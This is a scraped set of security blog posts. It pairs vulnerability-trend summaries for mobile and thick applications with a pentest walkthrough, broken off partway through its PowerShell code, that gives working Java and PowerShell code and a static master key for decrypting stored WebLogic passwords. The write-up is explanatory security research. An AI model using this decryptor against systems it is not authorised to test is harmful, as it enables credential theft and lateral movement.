We see encryption keys hardcoded in source code all the time. Again, this primarily affects Android applications because of the relative ease of decompiling APK files. As I said in my thick application post, encryption is only as strong as where the key is held. The recommendation is also the same: if data requires encryption with a key, move it from the client to the server to prevent access to keys.

Hardcoded or Nonexistent Salts

I'll take the exact blurb that I used in my thick application post. When using encryption, it is always a good idea to use a salt. However, if that salt is hardcoded in an application with an encryption key, it becomes pretty much useless. When it comes to encryption being a salty S.O.B. is a good thing. Randomize! Randomize! Randomize!

XML External Entity Injection

This has become more prevalent in the past year with many mobile web services communicating with XML. XXE often results in read access to files on the server and UNC path injection that can be used to capture and crack credentials used on the associated web server if it is running Windows. Most XML parsing libraries support disallowing declared DTDs and entities. This should be set as the default when reading XML to help prevent injection. Another possible fix is to scrap XML altogether and instead use JSON, where this isn't an issue.
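
As an illustration of that default, here is one way to disable DTD and entity handling in Python with lxml. This is an assumption about the parsing stack; most XML libraries expose equivalent switches.

from lxml import etree

# refuse DTDs and entity resolution so external entities are never fetched
parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)
doc = etree.fromstring(b"<request><user>alice</user></request>", parser)
print(doc.findtext("user"))  # alice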

Logging of Sensitive Information

Logging of data is fairly common in applications that we test, both in production and QA environments. Oftentimes it comes from having some type of debugging option enabled. This isn't necessarily a bad thing until there’s data that you don’t want anyone to see. The most common sensitive data we see are credentials. Make sure that debugging is disabled for production applications, and check application and system logs during testing to ensure unintended data is not there.

Unencrypted Transmission of Data

This is still common to see in mobile applications. Every application we test uses web services, but not all use encryption. Utilizing TLS should be the default on all traffic coming to and from the application. Oftentimes we see this in mobile applications developed for use in internal environments where security requirements are unfortunately more relaxed. Throw that notion out the window and encrypt everything.

Authorization Bypass

As with thick applications, we see a lot of mobile applications use the GUI to enforce security controls without checking authorization on the backend. A user could access what they need by bypassing the GUI entirely and sending the requests they want directly through a proxy such as Burp. We have also seen applications pulling user permissions from the server and storing them on the client. A user could modify the permissions in the HTTP response before it reaches the client. Usually these permissions are worded in such a way that their meaning is obvious, such as has_access_to_secret_information=false. Replacing everything with true is an easy way to bump up your privileges and bypass intended application authorization. The solution is to never rely on the client for authorization checks.
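
A sketch of what that looks like server-side, with Flask as a hypothetical stand-in for the real web service: permissions live on the server and are checked per request, so editing flags like has_access_to_secret_information in transit changes nothing.

from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "change-me"  # placeholder

# server-side source of truth; nothing the client sends can alter it
PERMISSIONS = {"alice": {"secret_access": False}}

@app.route("/secret")
def secret():
    user = session.get("user")
    # authorization is decided here, not by the GUI or a flag in the response body
    if not user or not PERMISSIONS.get(user, {}).get("secret_access"):
        abort(403)
    return jsonify(secret="...")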

Sensitive Data Displayed in the GUI

This finding is pretty self-explanatory. An application displays cleartext passwords, social security numbers, credit card numbers, etc. unmasked within the GUI. This is bad not only because that information should generally not be displayed to the user, but also because it has to be stored either on the device or within a backend database somewhere. This is made worse when coupled with mobile applications not requiring users to re-authenticate after the application has been put into the background on the device. For example, if you have an application open and you hit the home button on an iOS device, the application is paused in the background. Selecting the application again will generally reopen it where you left off. So if you give someone your iPad after you looked at an application that doesn't mask sensitive information about you, that someone could just open it up again and see everything. This can be especially bad if you don't have a password set on your lockscreen.

Conclusion

Everything is going mobile, and the security of the information that can be accessed and stored should be priority number one. Take the above information into consideration when developing your mobile applications, and always remember to test. If you're not testing your apps, someone else will, and they probably won't be so candid about what they find.

Top 10 Critical Findings of 2014 - Thick Applications (April 13, 2015)

2014 has come and gone, so we thought we'd put out a list of some of the most common critical findings that we saw during thick application penetration tests over the past year. We keep a massive amount of statistics for every assessment we do, and in this blog I’ll cover high-level trends and the top 10 vulnerabilities we found. This should be interesting to application penetration testers and large companies that develop and manage their own code in house.

High Level Trends

Most of the thick applications we looked at were older and primarily written in Java, C#, and C/C++. It’s still pretty common to see companies making them available over the internet via Citrix and Terminal Services web interfaces. I also want to point out that when assessing newer thick applications we spend almost 90% of our time reviewing web service methods and configurations, because thick clients are basically just a wrapper for backend web service methods. Below are the top 10 critical thick application findings for 2014, listed in order from most to least common.

Cleartext Credential Storage

This is by far the most common thing we see across all of the thick applications we test. From our testing, credentials are usually stored in configuration files within the installation directory of an application, a local user preferences directory, or within the registry.  If you’re doing this, consider using integrated authentication and moving away from the two-tier architecture model.

Hardcoded Credentials in Source Code

Along with storing credentials on the operating system itself, we see applications with hardcoded credentials within their source code almost 100% of the time. This is mostly a problem in applications that use managed code: Java and C#/VBScript with .NET, for example. The most prevalent credentials? Database usernames and passwords. It's very easy for a developer to hardcode them into source code and leave them there in production. More often than not this results in the full compromise of the database and the backend database server. Once again, if you’re doing something like this, consider using integrated authentication and moving away from the two-tier architecture model.

Hardcoded Encryption Keys

If an application uses encryption to protect sensitive information such as credentials, it is at least one step ahead of the curve. However, encryption is only as strong as where the key is held. Oftentimes an encryption key is stored in an encryption function within the source code of an application. Again, hardcoded keys affect the majority of managed code applications that we see. If a static key is used on installation of an application, a user could use that key to decrypt data that someone else may have. If this sounds like something you’ve done, consider moving the encryption of data to the server side, where evil users can’t get their hands on your encryption keys.

Hardcoded or Nonexistent Salts

When using encryption, it is always a good idea to use a salt. However, if that salt is hardcoded in an application with an encryption key, it becomes pretty much useless. When it comes to encryption being a salty S.O.B. is a good thing.  Randomize! Randomize! Randomize!
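
Randomizing is cheap. A minimal Python sketch of a per-password random salt; the function and parameter choices are illustrative, not from the original post.

import hashlib
import os

def hash_password(password):
    salt = os.urandom(16)  # fresh random salt per password, never hardcoded
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100000)
    return salt, digest    # store both; a per-record salt defeats precomputed attacks

salt, digest = hash_password("hunter2")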

Unencrypted Transmission of Data

We see a lot of applications that do not use encryption when transmitting data. Keep in mind that most of the applications that we test are used by the healthcare and financial industries, where sensitive information needs to be protected. While it is most common to find this over HTTP (web services), we see a fair amount of unencrypted TDS traffic for SQL data. If you don’t have encryption at the transport layer make sure to SSL (TLS) all the things!

SQL Injection

SQL injection has been around for a long time and still affects many applications and services. Most of the applications we test access SQL databases on the backend, usually MSSQL and Oracle. A lot of the backend processing for thick applications just doesn't implement proper sanitization and parameterization of queries. As a result, it isn't hard for a malicious user to attach a proxy to intercept HTTP and TDS requests; tools like Burp Suite and Echo Mirage make it pretty easy. Oftentimes just inserting a single tick in an input field can cause a SQL error to pop up to the user. Make sure to enforce the principle of least privilege and sanitize your input everywhere!

Authorization Bypass

A lot of thick applications employ security through GUI controls but leave their web services completely wide open. A user may not be able to access a piece of functionality through the GUI of a thick application, but they can usually request what they need directly from a web service without any authorization checks.

XML External Entity Injection

Many thick applications employ XML for configuration files, HTTP requests and responses, and exporting and importing data. A lot of applications were simply created before the influx of entity injection attacks and thus were never properly protected against them on the client side or server side. XXE often results in read access to files on the server, as well as UNC path injection that can be used to capture and crack credentials used on the associated web server. Most XML parsing libraries support disallowing declared DTDs and entities. This should be set as the default when reading XML to help prevent injection.
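
As an example of what that default looks like (my sketch, shown with the lxml library; most XML libraries expose equivalent switches):

from lxml import etree

parser = etree.XMLParser(
    resolve_entities=False,   # don't expand declared entities
    no_network=True,          # never fetch external DTDs or entities
    dtd_validation=False,
)
doc = etree.fromstring(b"<config><host>db01</host></config>", parser)
print(doc.findtext("host"))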

SQL Query Manipulation

It is not uncommon to see the use of direct SQL queries within an application that a user can freely edit for their own use. We see this most often in custom search windows where a user is given the ability to search tables as they please. Letting users execute arbitrary SQL queries almost always leads to a complete takeover of the backend database server and, from there, movement within the environment. The general recommendation is don’t do that unless your required use case is “allow users to take over the network”.

Custom Encryption

This has come up a couple of times within the past year: an application rolling its own encryption algorithm. More often than not this ends up being some type of substitution cipher where every character is replaced with another one. Simply reversing the algorithm gives you back the cleartext of whatever was encrypted. NEVER ROLL YOUR OWN CRYPTO! [post_title] => Top 10 Critical Findings of 2014 - Thick Applications [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => top-10-critical-findings-of-2014-thick-applications [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:32:44 [post_modified_gmt] => 2023-03-16 14:32:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3419 [menu_order] => 683 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 3125 [post_author] => 7 [post_date] => 2015-04-06 07:00:48 [post_date_gmt] => 2015-04-06 07:00:48 [post_content] =>

The following blog walks through part of a recent penetration test and the decryption process for WebLogic passwords that came out of it. Using these passwords I was able to escalate onto other systems and Oracle databases. If you just want code and examples to perform this yourself, head here: https://github.com/NetSPI/WebLogicPasswordDecryptor.

Introduction

Recently on an internal penetration test I came across a couple of Linux servers with publicly accessible Samba shares. Open shares often contain something interesting, whether it be user credentials or other sensitive information. In this instance, one of the shares contained a directory named “wls1035”. Going through the various software acronyms in my head, this could either be Windows Live Spaces or WebLogic Server. Luckily it was the latter and not Microsoft’s failed blogging platform.

WebLogic is an application server from Oracle for serving up enterprise Java applications. I was somewhat familiar with it, as I do see it from time to time in enterprise environments, but I had never actually installed it or taken a look at its file structure. At this point I started to poke around the files to see if I could find anything useful, such as credentials. Doing a simple grep search for “password” revealed a whole lot of information. (This is not actual client data.)

user@box:~/wls1035# grep -R "password" *
Binary file oracle_common/modules/oracle.jdbc_12.1.0/aqapi.jar matches
oracle_common/plugins/maven/com/oracle/maven/oracle-common/12.1.3/oracle-common-12.1.3.pom:    <!-- and password for your server here. -->
user_projects/domains/mydomain/bin/startManagedWebLogic.sh:#  to your system password for no username and password prompt 
user_projects/domains/mydomain/bin/stopManagedWebLogic.sh:# WLS_PW         - cleartext password for server shutdown
user_projects/domains/mydomain/bin/stopWebLogic.sh:	if [ "${password}" != "" ] ; then
user_projects/domains/mydomain/bin/stopWebLogic.sh:		wlsPassword="${password}"
user_projects/domains/mydomain/bin/stopWebLogic.sh:echo "connect(${userID} ${password} url='${ADMIN_URL}', adminServerName='${SERVER_NAME}')" >>"shutdown-${SERVER_NAME}.py" 
user_projects/domains/mydomain/bin/startWebLogic.sh:	JAVA_OPTIONS="${JAVA_OPTIONS} -Dweblogic.management.password=${WLS_PW}"
user_projects/domains/mydomain/bin/startWebLogic.sh:echo "*  password assigned to an admin-level user.  For *"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:    if [ -n "$username" -a -n "$password" ]; then
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       print_info "Investigating username: '$username' and password: '$password'"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$password" >>"$NMBootFile.tmp"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       unset username password
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$Password" >>"$NMBootFile.tmp"
user_projects/domains/mydomain/init-info/config-nodemanager.xml:  <nod:password>{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=</nod:password>
user_projects/domains/mydomain/init-info/security.xml:  <user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user.">

There weren't any cleartext passwords, but there were encrypted ones in the same style as this: {AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=
I then narrowed down my search to see if I could find more of these passwords. This was the result:

user@box:~/wls1035# grep -R "{AES}" *
user_projects/domains/mydomain/init-info/config-nodemanager.xml:  <nod:password>{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=</nod:password>
user_projects/domains/mydomain/init-info/security.xml:  <user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user.">
user_projects/domains/mydomain/init-info/security.xml:  <user name="supersecretuser" password="{AES}BQp5xBlvsy6889edpwXUZxCbx7crRc5+TNuZHSBl50A=">
user_projects/domains/mydomain/servers/myserver/security/boot.properties:username={AES}/DG7VFmJODIZJoQGmqxU8OQfkZxiKLuHQ69vqYPgxyY=
user_projects/domains/mydomain/servers/myserver/security/boot.properties:password={AES}Bqy44qL0EM4ZqIqxgIRQxXv1lg7PxZ7lI1DLlx7njts=
user_projects/domains/mydomain/config/config.xml:    <credential-encrypted>{AES}Yl6eIijqn+zdATECxKfhW/42wuXD5Y+j8TOwbibnXkz/p4oLA0GiI8hSCRvBW7IRt/kNFhdkW+v908ceU75vvBMB4jZ7S/Vdj+p+DcgE/33j82ZMJbrqZiQ8CVOEatOL</credential-encrypted>
user_projects/domains/mydomain/config/config.xml:    <node-manager-password-encrypted>{AES}+sSbNNWb5K1feAUgG5Ah4Xy2VdVnBkSUXV8Rxt5nxbU=</node-manager-password-encrypted>
user_projects/domains/mydomain/config/config.xml:    <credential-encrypted>{AES}nS7QvZhdYFLlPamcgwGoPP7eBuS1i2KeFNhF1qmVDjf6Jg6ekiVZOYl+PsqoSf3C</credential-encrypted>

There were a lot of encrypted passwords, and that fueled my need to know what they contain. Doing a simple base64 decode didn't reveal anything, but I didn't expect it to, based on each string being prepended with {AES}. In older versions of WebLogic the encryption algorithm is 3DES (Triple DES), which has a format similar to this: {3DES}JMRazF/vClP1WAgy1czd2Q==. The prefix must mean there was a key that was used for encrypting, which means the same key is used for decrypting. To properly test all of this, I needed to install my own WebLogic server.
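
Before going further, a throwaway snippet (my own illustration) confirms that the payload behind the prefix is plain binary ciphertext of a fixed size:

import base64

token = "{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I="
algo, b64 = token[1:].split("}", 1)
raw = base64.b64decode(b64)
print(algo, len(raw))   # AES 32 -- two 16-byte blocks, which matters later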

WebLogic is free to download from Oracle. For this blog I am using version 12.1.3. Installing WebLogic can be a chore in and of itself and I won't be covering it. One takeaway from the installation is configuring a new domain, which shouldn't be confused with a Windows domain. Quoting the WebLogic documentation, "A domain is the basic administration unit for WebLogic Server instances." Every domain contains security information. This can be seen in the grep command from above: all the file paths that contain encrypted passwords are within the mydomain directory.

Now that I had my own local WebLogic server installed, it was time to find out how to decrypt the passwords. Some quick googling resulted in a few Python scripts that could do the job. Interestingly enough, WebLogic comes with a scripting tool called WLST (WebLogic Scripting Tool) that allows Python to run WebLogic methods. This includes encryption and decryption methods. We can also run it standalone to just encrypt:

root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

wls:/offline> pw = encrypt('password')
wls:/offline> print pw
{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=

To decrypt, I used the following Python script from Oracle.

import sys
import os
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

def decrypt(agileDomain, encryptedPassword):
    agileDomainPath = os.path.abspath(agileDomain)
    encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)
    password = ces.decrypt(encryptedPassword)
	
    print "Plaintext password is:" + password

try:
    if len(sys.argv) == 3:
        decrypt(sys.argv[1], sys.argv[2])
    else:
        print "Please input arguments as below"
        print "		Usage 1: java weblogic.WLST decryptWLSPwd.py  "
        print "		Usage 2: decryptWLSPwd.cmd "
        print "Example:"
        print "		java weblogic.WLST decryptWLSPwd.py C:\Agile\Agile933\agileDomain {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="
        print "		decryptWLSPwd.cmd {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="
except:
    print "Exception: ", sys.exc_info()[0]
    dumpStack()
    raise

To test this script I needed to use an encrypted password from my newly installed WebLogic server. Using the same grep command from above returns the same number of results:

root@kali:~/wls12130# grep -R "{AES}" *
user_projects/domains/mydomain/init-info/config-nodemanager.xml: <nod:password>{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ=</nod:password>
user_projects/domains/mydomain/init-info/security.xml: <user name="OracleSystemUser" password="{AES}gTRFf+pONckQsJ55zXOw5JPfcsdNTC0lAURre/3zK0Q=" description="Oracle application software system user.">
user_projects/domains/mydomain/init-info/security.xml: <user name="netspi" password="{AES}Dm/Kp/TkdGwaikv3QD40UBhFQQAVtfbEXEwRjR0RpHc=">
user_projects/domains/mydomain/servers/myserver/security/boot.properties:username={AES}0WDnHP4OC5iVBze+EQ2JKGgtUb8K1mMK8QbtSTgKq+Y=
user_projects/domains/mydomain/servers/myserver/security/boot.properties:password={AES}OGs2ujN70+atq9F70xqXxFQ11CD5mGuxuekNJbRGJqM=
user_projects/domains/mydomain/config/config.xml: <credential-encrypted>{AES}KKGUxV84asQMrbq74ap373LNnzsXbchoJKu8IxecSlZmXCrnBrb+6hr8Z8bOCIHTSKXSl9myvwYQ2cXQ7klCF7wxqlkf0oOHw2VaFdFtlNAY1TuFGmkByRW4xaV2ITSo</credential-encrypted>
user_projects/domains/mydomain/config/config.xml: <node-manager-password-encrypted>{AES}mY78lCyPd5GmgEf7v5qYTQvowjxAo4m8SwRI7rJJktw=</node-manager-password-encrypted>
user_projects/domains/mydomain/config/config.xml: <credential-encrypted>{AES}/0yRcu56nfpxO+aTceqBLf3jyYdYR/j1+t4Dz8ITAcoAfsKQmYgJv1orfpNHugPM</credential-encrypted>

Taking the first encrypted password and throwing it into the Python script did indeed return the cleartext password for my newly created domain:

root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST decrypt.py . "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

Plaintext password is:Password1

The only problem is, we had to be attached to WebLogic to get it. I want to be able to decrypt passwords without having to run scripts through WebLogic.

Down the Rabbit Hole

My first step in figuring out how passwords are both encrypted and decrypted was to look at the Python script we obtained and see what libraries it calls. The first thing it does is import the following:

import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

It then makes the following method calls within the decrypt function:

encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)
ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)
password = ces.decrypt(encryptedPassword)

The first line takes the path of the domain as a parameter. In our case, the domain path is /root/wls12130/user_projects/domains/mydomain. What the weblogic.security.internal.SerializedSystemIni.getEncryptionService call does next is look for the SerializedSystemIni.dat file within the security directory. The SerializedSystemIni.dat file contains the salt and encryption keys for encrypting and decrypting passwords. It's read byte-by-byte in a specific order. Here’s a pseudocode version of what’s going on, along with an explanation for each line.

file = “SerializedSystemIni.dat”
numberofbytes = file.ReadByte()
salt = file.ReadBytes(numberofbytes)
encryptiontype = file.ReadByte()
numberofbytes = file.ReadByte()
encryptionkey = file.ReadBytes(numberofbytes)
if encryptiontype == AES then
	numberofbytes = file.ReadByte()
	encryptionkey = file.ReadBytes(numberofbytes)
  1. The first thing that happens is the first byte of the file is read. That byte is an integer for the number of bytes in the salt.
  2. The salt is then read, up to the number of bytes specified in the numberofbytes variable.
  3. The next byte is then read, which is assigned to the encryptiontype variable.
  4. Then the next byte is read, which is another integer for how many bytes should be read for the encryptionkey.
  5. The bytes for the encryptionkey are read.
  6. Now, if the encryptiontype is equal to AES, we go into the if statement block.
  7. The next byte is read, which is the number of bytes in the second encryptionkey.
  8. The bytes for that encryptionkey are read.

As I noted before, WebLogic uses two encryption algorithms depending on the release. These are 3DES and AES. This is where the two encryption keys come into play from above. If 3DES is in use, the first encryption key is used. If AES is used, the second encryption key is used.
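
For clarity, here is the same layout expressed as a small, runnable Python 3 sketch (my own translation of the pseudocode above; the names are illustrative):

def read_serialized_system_ini(path):
    # Parse SerializedSystemIni.dat per the byte layout described above.
    with open(path, "rb") as f:
        num = f.read(1)[0]            # length of the salt
        salt = f.read(num)            # salt bytes
        version = f.read(1)[0]        # encryption type byte
        num = f.read(1)[0]            # length of the 3DES key
        key = f.read(num)             # first (3DES) encryption key
        if version >= 2:              # AES installs carry a second key
            num = f.read(1)[0]
            key = f.read(num)         # AES encryption key (itself encrypted)
    return salt, key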

After doing a little bit of searching, I figured out that BouncyCastle is the library performing all the crypto behind the scenes. The next step is to start implementing the decryption ourselves, since we have at least some idea of what is going on under the hood. For now, we will just focus on the AES decryption portion instead of 3DES. I'm not terribly familiar with BouncyCastle or Java crypto implementations, so I did some googling on how to implement AES decryption. The result is the following snippet of code:

IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec,ivParameterSpec);

byte[] cleartext = outCipher.doFinal(encryptedPassword);

This code is promising, but unfortunately doesn’t work. We don’t know what the IV is, and using the encryption key as the SecretKeySpec won’t work because it’s not the correct type. Plus, we have this salt that is probably used somewhere. After many hours of digging, I figured out that the IV happens to be the first 16 bytes of the base64-decoded ciphertext and the encrypted password is the last 16 bytes. I made an educated guess that the salt is probably part of the PBEParameterSpec, because the first parameter in the documentation for it is a byte array named salt. The encryption key that we have also happens to be encrypted itself, so we have to decrypt the encryption key and then use that to decrypt the password. I found very few examples of this type of encryption process, but after more time I was finally able to put the following code together:

PBEParameterSpec pbeParameterSpec = new PBEParameterSpec(salt, 0);

Cipher cipher = Cipher.getInstance(algorithm);
cipher.init(Cipher.DECRYPT_MODE, secretKey, pbeParameterSpec);
SecretKeySpec secretKeySpec = new SecretKeySpec(cipher.doFinal(encryptionkey), "AES");

byte[] iv = new byte[16];
System.arraycopy(encryptedPassword1, 0, iv, 0, 16);
byte[] encryptedPassword2 = new byte[16];
System.arraycopy(encryptedPassword1, 16, encryptedPassword2, 0, 16);
IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec,ivParameterSpec);

byte[] cleartext = outCipher.doFinal(encryptedPassword2);

So now we have a decryption process for the encryption key, but we don’t know the key that decrypts it or the algorithm that is being used.

I found that WebLogic uses the algorithm PBEWITHSHAAND128BITRC2-CBC, and the key happens to be static across every installation of WebLogic:

0xccb97558940b82637c8bec3c770f86fa3a391a56

Now we can fix our code up a bit. Looking through examples of password-based encryption in BouncyCastle, the following seemed right:

SecretKeyFactory keyFact = SecretKeyFactory.getInstance("PBEWITHSHAAND128BITRC2-CBC");

PBEKeySpec pbeKeySpec = new PBEKeySpec(password,salt,iterations);

SecretKey secretKey = keyFact.generateSecret(pbeKeySpec);

The PBEKeySpec takes a password, salt, and iteration count. The password will be our static key string, but we have to convert it to a char array first. The second is our salt, which we already know. The third is an iteration count, which we do not know. The iteration count happens to be five; I actually just wrote a wrapper around the method and incremented the value until I got a successful result.
Here is our final code:

public static String decryptAES(String SerializedSystemIni, String ciphertext) throws NoSuchAlgorithmException, InvalidKeySpecException, NoSuchPaddingException, InvalidAlgorithmParameterException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException, IOException {

    byte[] encryptedPassword1 = new BASE64Decoder().decodeBuffer(ciphertext);
    byte[] salt = null;
    byte[] encryptionKey = null;

    String key = "0xccb97558940b82637c8bec3c770f86fa3a391a56";

    char password[] = new char[key.length()];

    key.getChars(0, password.length, password, 0);

    FileInputStream is = new FileInputStream(SerializedSystemIni);
    try {
        salt = readBytes(is);

        int version = is.read();
        if (version != -1) {
            encryptionKey = readBytes(is);
            if (version >= 2) {
                encryptionKey = readBytes(is);
            }
        }
    } catch (IOException e) {

    }

    SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWITHSHAAND128BITRC2-CBC");

    PBEKeySpec pbeKeySpec = new PBEKeySpec(password, salt, 5);

    SecretKey secretKey = keyFactory.generateSecret(pbeKeySpec);

    PBEParameterSpec pbeParameterSpec = new PBEParameterSpec(salt, 0);

    Cipher cipher = Cipher.getInstance("PBEWITHSHAAND128BITRC2-CBC");
    cipher.init(Cipher.DECRYPT_MODE, secretKey, pbeParameterSpec);
    SecretKeySpec secretKeySpec = new SecretKeySpec(cipher.doFinal(encryptionKey), "AES");

    byte[] iv = new byte[16];
    System.arraycopy(encryptedPassword1, 0, iv, 0, 16);
    byte[] encryptedPassword2 = new byte[16];
    System.arraycopy(encryptedPassword1, 16, encryptedPassword2, 0, 16);

    IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
    Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec, ivParameterSpec);

    byte[] cleartext = outCipher.doFinal(encryptedPassword2);

    return new String(cleartext, "UTF-8");

}

We run this with our SerializedSystemIni.dat file as the first argument and the encrypted password as the second without the prepended {AES}. The result returns our password!


As an exercise, I wanted to do this without having to touch Java ever again, so I decided to try it in PowerShell, everyone’s favorite pentest scripting language. BouncyCastle provides a DLL that we can use to perform the decryption; we just have to load it within the PowerShell code and call its methods. The result is the following PowerShell code:

<#
    Author: Eric Gruber 2015, NetSPI
    .Synopsis
    PowerShell script to decrypt WebLogic passwords
    .EXAMPLE
    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:\SerializedSystemIni.dat -CipherText "{3DES}JMRazF/vClP1WAgy1czd2Q=="
    .EXAMPLE
    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:\SerializedSystemIni.dat -CipherText "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="
#>
function Invoke-WebLogicPasswordDecryptor
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory = $true,
        Position = 0)]
        [String]
        $SerializedSystemIni,

        [Parameter(Mandatory = $true,
        Position = 1)]
        [String]
        $CipherText,

        [Parameter(Mandatory = $false,
        Position = 2)]
        [String]
        $BouncyCastle
    )

    if (!$BouncyCastle)
    {
        $BouncyCastle = '.\BouncyCastle.Crypto.dll'
    }

    Add-Type -Path $BouncyCastle

    $Pass = '0xccb97558940b82637c8bec3c770f86fa3a391a56'
    $Pass = $Pass.ToCharArray()

    if ($CipherText.StartsWith('{AES}'))
    {
        # Substring avoids TrimStart's per-character trimming, which could
        # eat leading base64 characters such as 'A'
        $CipherText = $CipherText.Substring(5)
    }
    elseif ($CipherText.StartsWith('{3DES}'))
    {
        $CipherText = $CipherText.Substring(6)
    }

    $DecodedCipherText = [System.Convert]::FromBase64String($CipherText)

    $BinaryReader = New-Object -TypeName System.IO.BinaryReader -ArgumentList ([System.IO.File]::Open($SerializedSystemIni, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite))
    $NumberOfBytes = $BinaryReader.ReadByte()
    $Salt = $BinaryReader.ReadBytes($NumberOfBytes)
    $Version = $BinaryReader.ReadByte()
    $NumberOfBytes = $BinaryReader.ReadByte()
    $EncryptionKey = $BinaryReader.ReadBytes($NumberOfBytes)

    if ($Version -ge 2)
    {
        $NumberOfBytes = $BinaryReader.ReadByte()
        $EncryptionKey = $BinaryReader.ReadBytes($NumberOfBytes)

        $ClearText = Decrypt-AES -Salt $Salt -EncryptionKey $EncryptionKey -Pass $Pass -DecodedCipherText $DecodedCipherText
    }
    else
    {
        $ClearText = Decrypt-3DES -Salt $Salt -EncryptionKey $EncryptionKey -Pass $Pass -DecodedCipherText $DecodedCipherText
    }

    Write-Host "Password:" $ClearText

}

function Decrypt-AES
{
    param
    (
        [byte[]]
        $Salt,

        [byte[]]
        $EncryptionKey,

        [char[]]
        $Pass,

        [byte[]]
        $DecodedCipherText
    )

    $EncryptionCipher = 'AES/CBC/PKCS5Padding'

    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'

    $IV = New-Object -TypeName byte[] -ArgumentList 16

    [array]::Copy($DecodedCipherText,0,$IV, 0 ,16)

    $CipherText = New-Object -TypeName byte[] -ArgumentList ($DecodedCipherText.Length - 16)
    [array]::Copy($DecodedCipherText,16,$CipherText,0,($DecodedCipherText.Length - 16))


    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher,$Salt,5)

    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher,$Pass,$AlgorithmParameters)


    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)
    $KeyCipher.Init($false, $CipherParameters)

    $Key = $KeyCipher.DoFinal($EncryptionKey)


    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)
    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key
    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter , $IV)

    $Cipher.Init($false, $ParametersWithIV)
    $ClearText = $Cipher.DoFinal($CipherText)

    [System.Text.Encoding]::ASCII.GetString($ClearText)
}

function Decrypt-3DES
{
    param
    (
        [byte[]]
        $Salt,

        [byte[]]
        $EncryptionKey,

        [char[]]
        $Pass,

        [byte[]]
        $DecodedCipherText
    )

    $EncryptionCipher = 'DESEDE/CBC/PKCS5Padding'

    $EncryptionKeyCipher = 'PBEWITHSHAAND128BITRC2-CBC'

    $IV = New-Object -TypeName byte[] -ArgumentList 8

    [array]::Copy($Salt,0,$IV, 0 ,4)
    [array]::Copy($Salt,0,$IV, 4 ,4)

    $AlgorithmParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateAlgorithmParameters($EncryptionKeyCipher,$Salt,5)
